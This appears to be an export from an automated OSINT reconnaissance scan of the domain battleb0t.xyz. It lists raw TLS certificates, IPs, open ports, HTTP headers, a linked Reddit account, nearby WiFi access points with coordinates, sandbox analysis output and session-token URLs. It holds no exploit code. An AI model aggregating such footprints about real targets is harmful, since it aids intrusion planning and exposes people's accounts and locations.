da:94:32:dc:5c:78:ad:19:fa:b3:fb:26:0f:35:c2:
87:17:c9:ae:6f:c7:ce:81:d6:7d:27:95:3b:49:39:
e6:cf:30:85:95:79:a1:35:71:86:5b:66:f7:9d:ae:
96:d5:9a:1d:e3:e0:76:fe:b7:a0:b5:1a:16:0b:1b:
5e:d4:d9:5b:b6:4a:4d:33:65:03:80:b9:ab:69:35:
1b:42:d7
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
E6:0D:FB:5E:53:09:44:30:22:92:3D:83:C3:34:06:A0:52:1B:50:06
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:kekw.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Mar 13 13:52:05.336 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:57:F9:C2:75:97:36:8B:12:D4:C1:E7:CA:
50:E7:70:49:3E:19:7B:CF:6E:2E:B2:32:0A:7B:AB:5D:
31:9F:A6:29:02:21:00:A5:FD:E1:03:A8:C4:49:20:AF:
46:1D:1E:50:E3:8E:07:43:7A:DC:16:22:84:DD:F5:8B:
28:06:E9:91:CB:AE:41
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Mar 13 13:52:05.327 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:19:EA:4C:FF:35:E1:97:F0:36:1E:40:22:
0D:44:8D:BA:C6:F1:8F:73:35:1F:B7:67:97:EA:2B:1B:
FC:27:7F:33:02:21:00:81:59:F8:29:60:75:D8:8F:00:
60:06:8E:9A:65:C6:5E:93:57:7E:5C:BF:B5:78:29:4F:
6F:C1:3B:97:29:1D:C7
Signature Algorithm: sha256WithRSAEncryption
24:d6:1b:d8:e4:8b:66:d1:df:e9:e2:97:93:78:a9:26:b8:6c:
f8:3c:98:90:50:e1:55:d7:91:ae:77:21:2c:40:df:85:16:56:
67:98:1c:b9:14:ca:43:24:bf:39:32:06:c7:fe:42:03:fa:45:
3b:3f:39:c5:26:88:13:e9:3d:1d:bc:bd:a1:0a:08:74:1a:3b:
e6:07:80:5b:f5:9a:21:ed:4a:45:40:ac:8a:6d:c1:de:40:12:
47:d5:33:88:6e:06:c5:32:a1:76:01:b1:50:fb:53:29:92:fa:
e1:03:af:88:12:00:9a:38:a5:9d:32:3e:46:8b:7c:f6:27:29:
ec:fa:85:68:fa:91:a6:95:c5:d7:a0:da:33:eb:03:cf:9c:a6:
c0:5c:0d:e8:d8:f8:03:5d:fb:9f:61:df:e1:a0:63:74:01:18:
4c:0d:17:f3:db:74:32:3c:fc:3b:44:24:e7:10:2b:f7:69:d2:
89:35:6f:e7:d7:11:5a:13:0a:a9:83:9e:0f:c2:f2:ea:d8:50:
30:65:9c:16:49:f6:30:d8:a2:e3:83:ff:5d:ff:00:a2:ff:57:
de:68:f4:70:90:a3:db:c8:9c:55:ce:ea:f6:4c:08:6a:01:70:
91:f9:f8:91:9d:f2:99:1f:be:06:10:87:53:07:83:04:df:62:
62:3f:1f:52
|
| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | Netherlands | Amsterdam, North Holland, 1012, Netherlands, Europe |
| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 6 | 0 | None | Montenegro | amcodev.me |
| 2023-05-12 02:44:19 | SSL Certificate - Raw Data | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:b6:39:33:af:de:1e:32:f3:fc:2e:76:dc:bc:08:51:86:10
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Feb 25 01:39:25 2023 GMT
Not After : May 26 01:39:24 2023 GMT
Subject: CN=battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ab:c7:1b:0c:ed:c6:01:f8:ea:a9:b3:cf:08:17:
4f:a2:cb:7c:34:c4:66:12:e6:ef:f3:98:17:79:c9:
65:ee:66:4c:1f:9a:92:7d:33:ee:07:fa:2e:15:62:
f7:b4:f3:1f:d5:4f:2e:b1:67:a8:49:42:bf:e3:cc:
9a:b7:30:46:c2:68:f5:28:a9:64:69:6f:4c:4b:64:
24:c9:dc:ed:46:9f:a4:1f:c2:ef:6f:36:d0:bc:69:
27:b8:e2:d6:18:70:40:2c:b4:f5:ee:8f:f7:0d:8c:
6e:03:92:e7:5d:d6:3e:bc:bb:c9:5b:28:10:a0:5a:
f6:37:f5:e1:9e:15:23:72:6e:8e:69:01:09:a4:8c:
a4:c9:d7:db:05:01:90:48:4b:90:20:8c:38:7a:0a:
60:74:79:18:26:30:8e:60:0b:17:b9:24:a0:80:df:
3f:14:00:d3:09:e7:34:47:35:63:7c:54:d2:a0:9d:
e1:57:d1:cb:13:d3:3c:30:24:97:8e:ea:34:00:9f:
cc:6c:0c:6a:f7:54:bc:5e:60:dc:46:31:c2:09:de:
d9:c3:e3:63:1e:8f:1c:c5:90:90:e8:da:86:be:7d:
f1:c3:1f:1a:86:69:9b:0b:e0:b2:0c:47:08:c8:92:
59:2b:66:2f:fa:a1:38:a1:2f:10:65:f6:97:fd:16:
87:33
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
63:4E:15:85:56:5A:A4:94:02:C2:16:42:A4:A5:97:9A:38:02:57:97
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:battleb0t.xyz, DNS:www.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Feb 25 02:39:25.268 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:87:F6:3C:B2:E0:C2:7B:F4:59:32:49:
FF:84:EE:E1:AC:5D:A1:7E:84:DE:B8:AC:92:3B:97:98:
6D:C7:11:07:D0:02:21:00:8E:A1:79:1C:1F:BD:8E:15:
DE:AB:97:FE:40:E1:D9:C2:1C:3E:55:3D:39:DF:88:B8:
3E:30:32:EA:CF:51:A0:F3
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Feb 25 02:39:25.238 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:C0:CA:4A:3A:01:79:C5:F7:4D:18:6C:
70:E8:74:A4:FC:31:5E:46:FF:DB:BC:55:79:1C:6B:D3:
2A:77:33:92:7D:02:21:00:B3:6C:B3:CD:94:6E:40:07:
54:43:CE:33:E0:3F:C2:49:48:DC:19:23:44:E4:9D:8B:
7E:E1:7F:46:CE:18:EF:B6
Signature Algorithm: sha256WithRSAEncryption
b2:e3:a8:2c:e5:ba:7b:3e:8e:fb:de:05:c9:db:df:10:e1:3a:
4a:d4:c8:e9:16:76:31:31:b8:1d:87:e3:42:15:5c:d9:01:d1:
e3:21:14:96:0d:03:d6:ab:2a:bb:6e:da:97:10:fe:b1:03:48:
ab:7e:6d:7b:96:6d:e0:3a:5a:e9:94:2e:83:ae:3f:a8:a5:8c:
25:3a:a9:c5:1d:63:8a:0d:55:4d:54:c8:3a:17:d4:72:72:76:
78:9d:29:2a:3b:de:f5:0a:4c:d8:44:82:1f:1a:29:cc:5c:2c:
bf:7e:db:71:7c:50:e3:91:fe:95:3f:d3:87:5f:30:37:48:ec:
63:b6:a1:ac:33:ac:63:05:b2:8f:6d:ee:9e:2e:ac:50:59:e9:
41:46:d2:71:65:05:17:42:d9:3e:21:9d:d7:90:39:a6:8f:2d:
e8:4a:d4:ff:6d:9e:32:c6:82:05:8f:a4:b5:74:b4:70:df:28:
4b:50:c8:1b:36:1a:ae:cf:7b:ab:92:23:e6:77:97:f2:47:a4:
b0:52:f2:9d:cf:be:68:a2:8a:f2:2f:f0:66:0b:d3:34:2a:c7:
8a:35:c4:1c:33:2d:e5:90:de:56:a7:97:86:7c:97:c9:45:8f:
99:61:22:00:3d:aa:b2:87:0d:35:bb:4c:f3:f8:1c:f8:99:c1:
e8:d1:30:c6
| battleb0t.xyz |
| 2023-05-12 02:45:54 | Physical Location | No | AbstractAPI | 1 | 0 | 4 | 0 | None | Ashburn, Virginia, 20149, United States, North America | 2600:1f18:2489:8200::c8 |
| 2023-05-12 02:47:56 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/madrobby/zepto/blob/master/src/form.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/madrobby/zepto/blob/master/src/ie.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/madrobby/zepto/blob/master/src/ajax.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/madrobby/zepto/blob/master/src/fx_methods.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/madrobby/zepto/blob/master/src/deferred.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/madrobby/zepto/blob/master/src/zepto.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/madrobby/zepto/blob/master/src/data.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/madrobby/zepto/blob/master/src/gesture.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/madrobby/zepto/blob/master/src/selector.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/madrobby/zepto/blob/master/src/ios3.js', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 19, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'http://zeptojs.com/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"SM0:6976:304:WilStaging_02"\n "Local\\SM0:6976:304:WilStaging_02"\n "Local\\SM0:6976:120:WilError_01"\n "SM0:6976:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:80"\n "138.91.254.96:443"\n "185.199.110.153:443"\n "104.21.16.28:443"\n "192.30.255.116:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"zeptojs.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.edgeoffer.microsoft.com"\n "api.github.com"\n "ghbtns.com"\n "zeptojs.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ""paypal.com"," (Indicator: "dir "; File: "wallet-checkout-eligible-sites-pre-stable.json")\n Found string ""baysidebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""comeherebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""www.facebook.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""linkedin.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string "<figure class="highlight"><pre><code class="language-js" data-lang="js"><span class="c1">// autolink everything that looks like a Twitter username</span>" (Indicator: "dir "; File: "urlref_httpzeptojs.com")\n Found string "<span class="s1">\'$1@<a href="http://twitter.com/$2">$2</a>\'</span><span class="p">)</span>" (Indicator: "dir "; File: "urlref_httpzeptojs.com")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""amazingclubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""purehockey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""order.firehousesubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""cousinssubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""digikey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""hockeymonkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""4amscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""allieandmickey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlref_httpzeptojs.com" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4044_143422276\\shopping.js]- [targetUID: 00000000-00004044]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00004072]\n "wallet-stable.json" has type "ASCII text"- [targetUID: N/A]\n "wallet.bundle.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%TEMP%\\4044_1336506228\\edge_driver.js]- [targetUID: 00000000-00004044]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4044_143422276\\edge_driver.js]- [targetUID: 00000000-00004044]\n "vendor.bundle.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_1]- [targetUID: 00000000-00004072]\n "wallet-drawer.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\4044_1336506228\\Wallet-Checkout\\wallet-drawer.bundle.js]- [targetUID: 00000000-00004044]\n "auto_open_controller.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4044_143422276\\auto_open_controller.js]- [targetUID: 00000000-00004044]\n "000009.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000009.log]- [targetUID: 00000000-00004044]\n "000013.ldb" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000013.ldb]- [targetUID: 00000000-00004044]\n "bnpl.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\4044_1336506228\\bnpl\\bnpl.bundle.js]- [targetUID: 00000000-00004044]\n "tokenized-card.bundle.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "edge_checkout_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4044_143422276\\edge_checkout_page_validator.js]- [targetUID: 00000000-00004044]\n "edge_confirmation_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4044_143422276\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00004044]\n "product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4044_143422276\\product_page.js]- [targetUID: 00000000-00004044]\n "miniwallet.bundle.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "notification.bundle.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Asset Store\\assets.db\\000003.log]- [targetUID: 00000000-00004044]\n "load_statistics.db" has type "SQLite 3.x database | 185.199.110.153 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Reddit (Category: social)
https://www.reddit.com/user/ayhu | ayhu |
| 2023-05-12 02:54:22 | Linked URL - External | No | Web Spider | 0 | 0 | 4 | 0 | None | https://qolhub.cloudflareaccess.com/cdn-cgi/access/verify-code/panel.battleb0t.xyz?kid=0e8fcd5c4d6f2fbb6bc18c164812f146f66e83d772c26262aaca860dfa7cb5c3&redirect_url=/&meta=eyJraWQiOiJlOTUxOWI4ZTZkZDg2N2Q4MGQwZTRiZWVhYjI5MjZlYjM3ZWJmYThhMWIxZjlmYmMwN2ExNjVkMGQ5YmEyZjFmIiwiYWxnIjoiUlMyNTYiLCJ0eXAiOiJKV1QifQ.eyJzZXJ2aWNlX3Rva2VuX3N0YXR1cyI6ZmFsc2UsImlhdCI6MTY4Mzg2MDA2Miwic2VydmljZV90b2tlbl9pZCI6IiIsImF1ZCI6IjBlOGZjZDVjNGQ2ZjJmYmI2YmMxOGMxNjQ4MTJmMTQ2ZjY2ZTgzZDc3MmMyNjI2MmFhY2E4NjBkZmE3Y2I1YzMiLCJob3N0bmFtZSI6InBhbmVsLmJhdHRsZWIwdC54eXoiLCJhcHBfc2Vzc2lvbl9oYXNoIjoiNGY3Yzk5OWY0YzQ5OTU5MTk1NTJkZGRhZTMxZjAzMTBmMjY5NzhlZmVkYTUzYWYyZDgxOGY1ZWVlNGVjYTI5MyIsIm5iZiI6MTY4Mzg2MDA2MiwiaXNfd2FycCI6ZmFsc2UsImlzX2dhdGV3YXkiOmZhbHNlLCJ0eXBlIjoibWV0YSIsInJlZGlyZWN0X3VybCI6IlwvIiwibXRsc19hdXRoIjp7ImNlcnRfaXNzdWVyX3NraSI6IiIsImNlcnRfcHJlc2VudGVkIjpmYWxzZSwiY2VydF9zZXJpYWwiOiIiLCJjZXJ0X2lzc3Vlcl9kbiI6IiIsImF1dGhfc3RhdHVzIjoiTk9ORSJ9LCJhdXRoX3N0YXR1cyI6Ik5PTkUifQ.nmLVBPo6h3yJ-eeLa1z8MJxup5DvHiZsxc_azrIBMDZkAuzXJXrBgg2dSJete3yFlMRnhoJH_s6r9en_PegF2VXgTcEejRV68gqMq3vN0gqcnLCjxJ7R_q2HnXYBEj1GnW4CnMF2ytqVCjGW9kOAsQf3EnRyTjMGNkhzWHc8cSXk-YZsczAFnsTwlEWEWf-Vtivai9PAOaJofIoE_LacgC5tzGLXINkdWAyouIP8rapadqait8eo8oF0pNIeRyyLHJRBoo5cXuRrs7jtBVREnw74sp6OKnYrw3iVG9BLCEN00TCsKQ0TApXWvZYkQfxCCgFAewQtUM8EIB0Sx1pQUg | https://qolhub.cloudflareaccess.com/cdn-cgi/access/login/panel.battleb0t.xyz?kid=0e8fcd5c4d6f2fbb6bc18c164812f146f66e83d772c26262aaca860dfa7cb5c3&redirect_url=%2F&meta=eyJraWQiOiJlOTUxOWI4ZTZkZDg2N2Q4MGQwZTRiZWVhYjI5MjZlYjM3ZWJmYThhMWIxZjlmYmMwN2ExNjVkMGQ5YmEyZjFmIiwiYWxnIjoiUlMyNTYiLCJ0eXAiOiJKV1QifQ.eyJzZXJ2aWNlX3Rva2VuX3N0YXR1cyI6ZmFsc2UsImlhdCI6MTY4Mzg2MDA2Miwic2VydmljZV90b2tlbl9pZCI6IiIsImF1ZCI6IjBlOGZjZDVjNGQ2ZjJmYmI2YmMxOGMxNjQ4MTJmMTQ2ZjY2ZTgzZDc3MmMyNjI2MmFhY2E4NjBkZmE3Y2I1YzMiLCJob3N0bmFtZSI6InBhbmVsLmJhdHRsZWIwdC54eXoiLCJhcHBfc2Vzc2lvbl9oYXNoIjoiNGY3Yzk5OWY0YzQ5OTU5MTk1NTJkZGRhZTMxZjAzMTBmMjY5NzhlZmVkYTUzYWYyZDgxOGY1ZWVlNGVjYTI5MyIsIm5iZiI6MTY4Mzg2MDA2MiwiaXNfd2FycCI6ZmFsc2UsImlzX2dhdGV3YXkiOmZhbHNlLCJ0eXBlIjoibWV0YSIsInJlZGlyZWN0X3VybCI6IlwvIiwibXRsc19hdXRoIjp7ImNlcnRfaXNzdWVyX3NraSI6IiIsImNlcnRfcHJlc2VudGVkIjpmYWxzZSwiY2VydF9zZXJpYWwiOiIiLCJjZXJ0X2lzc3Vlcl9kbiI6IiIsImF1dGhfc3RhdHVzIjoiTk9ORSJ9LCJhdXRoX3N0YXR1cyI6Ik5PTkUifQ.nmLVBPo6h3yJ-eeLa1z8MJxup5DvHiZsxc_azrIBMDZkAuzXJXrBgg2dSJete3yFlMRnhoJH_s6r9en_PegF2VXgTcEejRV68gqMq3vN0gqcnLCjxJ7R_q2HnXYBEj1GnW4CnMF2ytqVCjGW9kOAsQf3EnRyTjMGNkhzWHc8cSXk-YZsczAFnsTwlEWEWf-Vtivai9PAOaJofIoE_LacgC5tzGLXINkdWAyouIP8rapadqait8eo8oF0pNIeRyyLHJRBoo5cXuRrs7jtBVREnw74sp6OKnYrw3iVG9BLCEN00TCsKQ0TApXWvZYkQfxCCgFAewQtUM8EIB0Sx1pQUg |
| 2023-05-12 02:54:00 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c55c7e88fa82340-ORD
Content-Encoding: gzip
| 104.21.6.166 |
| 2023-05-12 02:54:10 | Netblock IPv6 Membership | No | Censys | 0 | 0 | 2 | 0 | None | 2606:4700:3031::/48 | 2606:4700:3031::6815:6a6 |
| 2023-05-12 03:01:37 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.136): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:09:38 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 106.48.229.35.bc.googleusercontent.com | 35.229.48.106 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Balcioglu (Net ID: 00:1A:2A:63:1A:23) | 40.2024, 29.0398 |
| 2023-05-12 02:47:32 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None | 172.67.135.9:8443 | 172.67.135.9 |
| 2023-05-12 02:44:15 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 1 | 2 | 0 | None | netlify.app | funny.battleb0t.xyz |
| 2023-05-12 03:09:10 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 46.101.229.68 | 46.101.229.70 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | AMX (Net ID: 00:02:E3:40:F7:BD) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:54:03 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7c5a3af72b618723-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 172.67.135.9 |
| 2023-05-12 03:34:24 | Affiliate - IP Address | No | DNS Look-aside | 0 | 0 | 3 | 0 | None | 45.131.109.50 | 45.131.109.53 |
| 2023-05-12 03:01:27 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.8): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:44:11 | Co-Hosted Site | No | SSL Certificate Analyzer | 4 | 1 | 1 | 0 | None | github.com | battleb0t.xyz |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | SpeedStream (Net ID: 00:01:24:F0:82:16) | 37.7813933,-122.3918002 |
| 2023-05-12 03:03:43 | Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | www.ayhu.xyz | [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://www.ayhu.xyz', u'http_status': 301, u'plugins': {u'Country': {u'string': [u'UNITED STATES'], u'module': [u'US']}, u'HTTPServer': {u'string': [u'cloudflare']}, u'RedirectLocation': {u'string': [u'https://www.ayhu.xyz/']}, u'UncommonHeaders': {u'string': [u'report-to,nel,cf-ray,alt-svc']}, u'IP': {u'string': [u'104.21.6.166']}}}, {}] |
| 2023-05-12 02:45:17 | SSL Certificate - Raw Data | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:9d:c5:27:de:ee:41:17:4e:89:34:e6:9d:87:79:d7:50:31
